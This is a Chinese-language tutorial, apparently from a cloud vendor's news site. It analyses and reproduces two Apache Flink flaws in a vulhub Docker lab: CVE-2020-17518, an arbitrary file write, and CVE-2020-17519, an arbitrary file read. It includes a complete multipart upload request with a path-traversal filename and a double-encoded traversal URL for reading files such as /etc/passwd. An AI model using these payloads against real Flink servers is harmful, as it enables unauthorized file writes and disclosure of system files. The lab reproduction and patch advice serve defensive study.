91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

發布時間:2021-12-28 20:31:51 來源:億速云 閱讀:207 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

0x00簡介

Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇并且已經應用與實際的業務場景中。很多公司在進行選型的時候都會選擇Apache Flink作為選型的對象。Flink核心是一個流式的數據流執行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能。基于流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。

0x01漏洞概述

CVE-2020-17519

Apache Flink 1.11.0中引入的一個更改(也在1.11.1和1.11.2中發布)允許攻擊者通過JobManager進程的REST接口讀取JobManager本地文件系統上的任何文件。

CVE-2020-17518

Apache Flink 1.5.1引入了一個REST處理程序,允許您通過惡意修改的HTTP頭將上傳的文件寫入到本地文件系統上的任意位置。

0x02影響范圍

CVE-2020-17519

1.11.0

1.11.1

1.11.2

CVE-2020-17518

Flink 1.5.1-1.11.2

0x03環境搭建

1.本次漏洞環境使用vulhub的docker環境搭建,vulhub下載地址:

https://github.com/vulhub/vulhub/

2.下載完成后傳入裝有docker和docker-compose環境的虛擬機,進入目錄

cd vulhub-master/flink/CVE-2020-17519/

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

3.使用docker-compose up -d 拉取漏洞環境,因17519的漏洞環境版本是1.11.2所以復現兩個漏洞只需要一個漏洞環境即可。出現”done”表示拉取成功

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

4.在瀏覽器輸入http://your-ip:8081查看頁面

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

0x04漏洞復現

CVE-2020-17518復現

1、首先我們先使用CVE-2020-17518漏洞寫入文件,在首頁抓包構造以下構建數據包進行發送

POST /jars/upload HTTP/1.1

Host: your-ip:8081

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=--------721072898

Content-Length: 149

----------721072898

Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/success"

success

----------721072898--

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

2.上面數據包返回的雖然是400但是已經寫入到docker中,進去docker查看

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

CVE-2020-17519復現

1.上面寫入后要是不能進入docker查看這里可以利用CVE-2020-17519漏洞進行文件讀取,在頁面首頁輸入以下payload查看tmp目錄下的文件

http://172.16.1.147:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

2.修改后面的payload改為查看etc下的passwd文件

如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

0x05修復建議

建議升級到安全版本或最新版本。

上述內容就是如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

凤城市| 乡宁县| 岐山县| 丹寨县| 开化县| 洛南县| 康定县| 始兴县| 天台县| 玛纳斯县| 田林县| 鹤岗市| 萨嘎县| 连云港市| 双桥区| 华亭县| 泽州县| 连山| 黄陵县| 彩票| 台东市| 浑源县| 宣武区| 锦州市| 巩留县| 礼泉县| 宝坻区| 辽阳市| 建阳市| 华蓥市| 同江市| 华坪县| 宜宾市| 镇沅| 时尚| 谷城县| 于田县| 隆安县| 新沂市| 慈利县| 正镶白旗|